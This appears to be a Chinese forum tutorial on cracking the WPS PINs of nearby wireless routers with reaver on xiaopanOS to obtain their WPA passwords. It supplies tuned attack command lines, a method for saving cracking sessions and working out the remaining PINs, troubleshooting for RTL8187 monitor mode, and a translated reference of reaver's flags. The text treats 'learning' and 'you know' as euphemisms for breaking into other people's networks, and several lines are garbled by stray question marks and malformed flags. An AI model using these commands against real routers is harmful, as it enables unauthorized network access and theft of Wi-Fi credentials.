（非TP-LINK路由推薦–d9 –t9參數防止路由僵死

reaver -i mon0 -b MAC -a -S –d9 –t9 -vv）

小結-學習時應因狀況調整參數（-c后面都已目標頻道為1作為例子）

目標信號非常好: ?reaver ?-i ?mon0 ?-b MAC ?-a ?-S ?-vv ?-d0 ?-c 1

目標信號普通: ?reaver ?-i ?mon0 ?-b MAC ?-a ?-S ?-vv ?-d2 ?-t 5 ?-c 1

目標信號一般: ?reaver ?-i ?mon0 ?-b MAC ?-a ?-S ?-vv ?-d 5 ?-c 1

?

參數一：-a -n -N -x 20 -r 100:10 -| 60 -t 2 -v d 0 (我默認使用這個)

參數二：-a –v –N –x20–r100:10 l300 –t12 –d0 （如想多等會，可將–t12修改為–t15等）

參數三：-a –v –S –x20–r100:10 l300 –t12 –d0 ?（如重碼多且速度太快，可將–d0修改為–d2）等）

參數四：-a –v –N –x20–r100:10 l300 –t12 –d0 –S（其他參數也可試一下，不要加-n）

?

xiaopanOS中reaver參數

-a -v -S -x 20 -r 100:10 -l 300

?

光盤啟動、u盤/硬盤啟動保存學習進度的方法

reaver1.3的保存路徑：打開桌面最后邊一個圖標xfec 定位到/etc/reaver下，有一個wpc后綴的文件，名字是你學習的目標的mac地址，復制到你的U盤，路徑是/mnt/sdb1（一般是這個，自己找找，要是沒有東西就右鍵mount），以后重啟到xiaopanOS，把這文件復制到原來的路徑，再試試，可以載入進度了！o(∩_∩)o 哈哈

reaver1.4的保存路徑：保存目錄：/usr/local/etc/reaver如果xfe文件管理器未獲得ROOT權限。請先運行root shell后輸入xfe即可獲得root權限。保存方法同上。下次重啟動后，再手工復制到/etc/reaver/ 目錄下即可

MAC地址.wpc 其實是個文本文件，格式與破密用字典酷似，其第一行和第二行，分別是4位數和3位數的指示位置數（+4）。

------------------------------------------------------------------------------

如果進度到99.9%后，AP死機，可打開它，總共1000個3位數，找出剩余的十幾個PIN碼，用QSS、WPS客戶端軟件,手動測試、破密。如果是跑了99.99%死機, ?意味嗎？ ?你懂的吧？ 最后一個PIN就是。

以下這個命令是指定PIN碼，獲得WPA 密碼PSK

reaver -i mon0 -b MAC -p PIN8位數

如果上述措施不后，仍不見PSK密碼，可能因軟件原因，漏碼了！需要重新跑后三位數！

（前四位正確的話）reaver -i mon0 -b MAC -p PIN前4位數

?

1.遇見8187驅動RF-kill的 ?xiaopanos

對8187的網卡支持不是太好，有時會出現驅動加載不了，就是輸入第一條命令后出現operation not possible due to RF-kill，我想大部分人也遇到過把。新版本0.34使用命令rfkill unblock all解決這個問題，容易出現問題的是0.3.2版本的。

第一種嘗試的解決辦法：這時候就斷開USB，等上大概10幾秒把再插上，連續插拔幾次總有一次會好。

第二種嘗試的解決辦法：先運行一下奶瓶掃描一會，然后退出奶瓶。 虛擬機 USB圖標（USB圖標上的小點）由深綠變成淺綠色，變淺綠就輸入

ifconfig wlan0 up

airmon-ng start wlan0

第三種解決辦法：出現錯誤后的解決

a.Root Shell窗口敲擊命令“ifconfig -a”，查看最后一項是否出現wlan0，這個就是你的無

線網卡。如果沒有出現拔插網卡，直到測試出現wlan0。

b.接下來輸入第二條命令“ifconfig wlan0 up”,接下來第三條“airmon-ng start wlan0”載入

網卡。如果出現operation not possible due to RF-kill，不要驚慌繼續輸入命令“airmon-ng start

wlan0”多輸入幾次，然后拔出USB網卡，再插入，重復第2步的命令。一般情況下就會

正常載入了括號內只會顯示monitor mode enabled on mon0，不會出現operation not possible

due to RF-kill，如果不行以上步驟再次重復，直到解決。

c.輸入“airodump-ng mon0”（如果括號內顯示的是monitor mode enabled on mon1，相應的

命令就改為airodump-ng mon1，其他的類似），測試一下，要是可以正常掃描，說明8187L加載成功，就可以reaver了，你懂的！

?

reaver參數說明

?

必須參數

-i, --interface=<wlan> Name of the monitor-mode interface to use 網卡的監視接口，通常是mon0

-b, --bssid=<mac> BSSID of the target AP

AP的MAC地址

Optional Arguments: 可選參數

-m, --mac=<mac> MAC of the host system

指定本機MAC地址

-e, --essid=<ssid> ESSID of the target AP

路由器的ESSID，一般不用指定

-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f) 信號的頻道，如果不指定會自動掃描 -o, --out-file=<file> Send output to a log file [stdout]

輸出日志文件

-s, --session=<file> Restore a previous session file

恢復進度文件

-C, --exec=<command> Execute the supplied command upon successful pin recovery pin成功后執行命令

-D, --daemonize Daemonize reaver

設置reaver成Daemon

-a, --auto Auto detect the best advanced options for the target AP 對目標AP自動檢測高級參數

-f, --fixed Disable channel hopping

禁止頻道跳轉

-5, --5ghz Use 5GHz 802.11 channels

使用5G頻道

-v, --verbose Display non-critical warnings (-vv for more) 顯示不重要警告信息 -vv 可以顯示更多 -q, --quiet Only display critical messages

只顯示關鍵信息

-h, --help Show help

顯示幫助

Advanced Options:高級選項

-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin 使用指定的4位或者8位pin碼 -d, --delay=<seconds> Set the delay between pin attempts [1] pin間延時，默認1秒

-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts

[60]

AP鎖定WPS后等待時間

-g, --max-attempts=<num> Quit after num pin attempts

最大pin次數

1/2

-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures

[0]

10次意外失敗后等待時間，默認0秒 -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts 每x次pin后等待y秒

-t, --timeout=<seconds> Set the receive timeout period [5] 收包超時，默認5秒

-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20] M5/M7超時，默認0.2秒

-A, --no-associate Do not associate with the AP (association must be done by another application)

不連入AP（連入過程必須有其他程序完成） -N, --no-nacks Do not send NACK messages when out of order packets are received

不發送NACK信息（如果一直pin不動，可以嘗試這個參數）

-S, --dh-small Use small DH keys to improve crack speed 使用小DH關鍵值提高速度（推薦使用） -L, --ignore-locks Ignore locked state reported by the target AP 忽略目標AP報告的鎖定狀態

-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet 每當收到EAP失敗包就終止WPS進程 -n, --nack Target AP always sends a NACK [Auto] 對目標AP總是發送NACK，默認自動 -w, --win7 Mimic a Windows 7 registrar [False] 模擬win7注冊，默認關閉

Ps：影響到無線的因素很多，所以各參數之間的配合很重要，當然，最關鍵的還是取決于信號。

reaver使用相關